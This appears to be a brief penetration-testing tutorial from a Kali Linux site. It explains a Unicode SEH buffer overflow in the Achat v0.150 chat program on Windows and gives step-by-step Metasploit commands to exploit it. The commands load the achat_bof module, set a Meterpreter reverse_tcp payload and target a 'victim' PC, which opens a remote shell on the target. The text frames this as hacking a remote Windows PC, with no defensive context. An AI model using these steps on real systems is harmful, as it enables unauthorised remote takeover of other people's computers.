Kali Linux, Penetration Testing

Hack Remote Windows PC using Achat Unicode SEH Buffer Overflow

This module exploits a Unicode SEH buffer overflow in Achat. By sending a crafted message to the default port 9256/UDP, it’s possible to overwrite the SEH handler. Even when the exploit is reliable, it depends on timing since there are two threads overflowing the stack in the same time. This module has been tested on Achat v0.150 running on Windows XP SP3 and Windows 7.

Exploit Targets

Achat v0.150


Attacker: kali Linux

Victim PC: Windows XP SP 3

Open Kali terminal type msfconsole

Now type use exploit/windows/misc/achat_bof

msf exploit (achat_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (achat_bof)>set lhost (IP of Local Host)

msf exploit (achat_bof)>set rhost (IP of Remote Host)

msf exploit (achat_bof)>exploit